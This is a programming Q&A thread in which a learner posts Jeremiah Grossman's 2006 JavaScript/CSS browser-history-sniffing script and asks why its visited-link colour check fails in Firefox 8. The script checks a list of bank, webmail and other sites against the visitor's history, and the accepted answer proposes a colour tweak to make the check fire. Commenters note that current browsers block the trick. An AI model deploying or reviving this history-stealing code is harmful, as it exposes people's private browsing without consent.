# Jeremiah Grossman JavaScript code for browser history CSS

Tags: javascript, firefox, browser

I am trying to learn JavaScript and am having a problem with this particular code from Jeremiah Grossman can be found at http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html.

Its an old post 2006 I believe. It basicly uses JavaScript and CSS to find out visited links in your browser history.

```
<script type="text/javascript">
var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);

// popular websites. Lookup if user has visited any.
var websites = [
  "http://ajaxian.com/",
  "http://digg.com/",
  "http://english.aljazeera.net/HomePage",
  "http://ha.ckers.org",
  "http://ha.ckers.org/blog/",
  "http://jeremiahgrossman.blogspot.com/",
  "http://login.yahoo.com/",
  "http://mail.google.com/",
  "http://mail.yahoo.com/",
  "http://my.yahoo.com/",
  "http://reddit.com/",
  "http://seoblackhat.com",
  "http://slashdot.org/",
  "http://techfoolery.com/",
  "http://weblogs.asp.net/jezell/",
  "http://www.amazon.com/",
  "http://www.aol.com/",
  "http://www.bankofamerica.com/",
  "http://www.bankone.com/",
  "http://www.blackhat.com/",
  "http://www.blogger.com/",
  "http://www.bloglines.com/",
  "http://www.bofa.com/",
  "http://www.capitalone.com/",
  "http://www.cenzic.com",
  "http://www.cgisecurity.com",
  "http://www.chase.com/",
  "http://www.citibank.com/",
  "http://www.cnn.com/",
  "http://www.comerica.com/",
  "http://www.e-gold.com/",
  "http://www.ebay.com/",
  "http://www.etrade.com/",
  "http://www.expedia.com/",
  "http://www.google.com/",
  "http://www.hsbc.com/",
  "http://www.icq.com/",
  "http://www.jailbabes.com",
  "http://www.microsoft.com/",
  "http://www.msn.com/",
  "http://www.myspace.com/",
  "http://www.ntobjectives.com",
  "http://www.passport.net/",
  "http://www.paypal.com/",
  "http://www.sourceforge.net/",
  "http://www.spidynamics.com",
  "http://www.statefarm.com/",
  "http://www.usbank.com/",
  "http://www.wachovia.com/",
  "http://www.wamu.com/",
  "http://www.watchfire.com",
  "http://www.webappsec.org",
  "http://www.wellsfargo.com/",
  "http://www.whitehatsec.com",
  "http://www.xanga.com/",
  "http://www.yahoo.com/",
  "http://seoblackhat.com/",
  "http://www.alexa.com/",
  "http://www.youtube.com/",
  "https://banking.wellsfargo.com/",
  "https://commerce.blackhat.com/",
  "https://online.wellsfargo.com/",
];

/* prevent multiple XSS loads */
if (! document.getElementById('xss_flag')) {

  var d = document.createElement('div');
  d.id = 'xss_flag';
  document.body.appendChild(d);

  var d = document.createElement('table');
  d.border = 0;
  d.cellpadding = 5;
  d.cellspacing = 10;
  d.width = '90%';
  d.align = 'center';
  d.id = 'data';
  document.body.appendChild(d);

  /* launch steal history */

if (is_mozilla) {
  stealHistory();
}

}

function stealHistory() {

  // loop through websites and check which ones have been visited
  for (var i = 0; i < websites.length; i++) {          
         var link = document.createElement("a");       
         link.id = "id" + i;       
         link.href = websites[i];       
         link.innerHTML = websites[i];              
         document.body.appendChild(link);       
         var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");       
         document.body.removeChild(link);       
// check for visited       
     if (color == "rgb(0, 0, 255)") {           
         document.write('' + websites[i] + '');
      } // end visited check
  
  } // end visited website loop

} // end stealHistory method
</script>
```

However, after 6 hours I am trying to get it to work properly but I have problems. The reason I found it not working is the if() below

```
// check for visited       
     if (color == "rgb(0, 0, 255)") {           
         document.write('' + websites[i] + '');
      } // end visited check
```

Before the if() I checked what color was being set in the var 'color' and all the links for each element in the array is returning `rgb(0, 0, 238)? I am not sure what these colors mean and how to get it to 0,0,255 so the if() will work?

I am guessing it could be that I have latest Firefox version 8.0.1? I have visited few of the links so they are defo in my browser history yet the color returned does not change?
Any help would be greatly appreciated thanks for your time.

Comment: Correct me if I am wrong, but I think that most web browsers avoid history sniffing. This method is almost 4 years old.

Comment: This script is adding a link to a document then checking the color of the link ... if its `rgb(0,0,255)` then it considers it visited .... this could break in so many ways - if the browser had a different color set for visited links for example !

Comment: And why the heck do you want to know what someones history is ?

Comment: I would try using jQuery to target a visited link: `$('a:visited').css('color');`

Comment: @ManseUK: It's a barely-functional method, so don't worry. It just checks whether you visited the homepage of those sites.

Comment: Blender, could you tell me where in the code I would put that?

Comment: @Blender just seems like a strange thing to do.... using CSS to determine visited status !

Comment: @daza166: No, I won't, as it won't help you. This method *only* works for Firefox, and I can confirm it on `3.6`. Firefox 8 doesn't work.

Comment: @ManseUK I would like to know how this trick works might do a project on this

Comment: @Blender no worries mate should I download old firefox version and see if it works?

Comment: @daza166: The trick is simple. When you visit a website, the link shows up as a different color. This script just checks what the default color for a link is and compares it to the color of every link. If the colors match, then you didn't visit the website. If they do match, then you probably did.

Comment: @daza166: I guess. You can grab them [here](http://www.mozilla.org/en-US/firefox/all-older.html).

Comment: @Blender ok will try on old versions. Just to clarify it will only so link as visited if (color == "rgb(0, 0, 255)")? So what color is this and what does this mean in terms of browser, should firefox return this rgb color if link is visited?

Comment: `rgb(0, 0, 255)` is pure blue. (`b` is at 255, which is `100%`). Firefox colors links blue if they are *not* visited. Look at the demo page of the script: http://ha.ckers.org/weird/CSS-history-hack.html

Comment: @blender just tried in 3.6 version and I am getting the color rgb(85, 26, 139) for visited sites I am guessing? If it's not visited it stays rgb(0, 0, 238). Thanks you get best answer but how do I give best answer to a comment?

Answer (score 1, accepted):

if you define your `a:link, a:visited` colors say using css you will then beable to easly check for example, see if that helps.

```
<style>
  a:link{color:green}
  a:visited {color:#993300}
 </style>


    // check for visited       
     if (color == "#993300") {           
      document.write('' + websites[i] + '');
    } // end visited check
```

Comment: No I can see your idea but does not seem to work I am guessing because of color mismatch in the if and the computedvalue from var color?

Comment: I actually see what u mean David it changes the default color of Firefox anchers, i.e. changes the rgb color to the set style ones. Clever.